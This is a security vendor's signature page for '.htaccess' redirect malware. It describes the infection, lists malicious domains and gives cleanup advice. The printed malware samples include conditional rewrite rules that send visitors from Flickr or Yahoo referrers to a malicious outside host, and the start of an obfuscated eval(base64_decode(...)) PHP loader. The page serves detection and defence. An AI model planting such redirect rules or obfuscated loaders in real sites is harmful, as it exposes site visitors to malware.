SiteCheck Signatures

  1. Home
  2. Signatures
  3. SiteCheck Signatures
  4. malware-entry-mwhta7

malware-entry-mwhta7

Description:
This attack uses the .htaccess file to redirect users to a site serving malware (or spam). In some cases, the index.php is also modified to do the redirection as well.

Loads malware from:


http://fgnfdfthrv.bee.pl/
alolipololi.osa.pl
gberbhjerfds.osa.pl
zxsoftpromo.ru
centralfederation.ru
chimeboom.ru
faqaboutme.ru
lkjoiban.ru
longqwality.ru
zxsoftpromo.ru
and other domains.

Affecting: Any type of web site (no specific target).

Clean up and details: Remove offending code from .htaccess and/or index.php or contact support@sucuri.net for help.

Links:
http://blog.sucuri.net/2010/04/conditional-redirects-or-the-htaccess-malware.html

Malware samples:

..
RewriteCond %{HTTP_REFERER} .flickr. [NC,OR]
RewriteCond %{HTTP_REFERER} .yahoo.$ [NC]
RewriteRule .* http://fgnfdfthrv.bee.pl/?q= [R,L] 

eval (base64_decode("CglpZiAoc3RyaXN0cigkX1NFUlZFUltIV..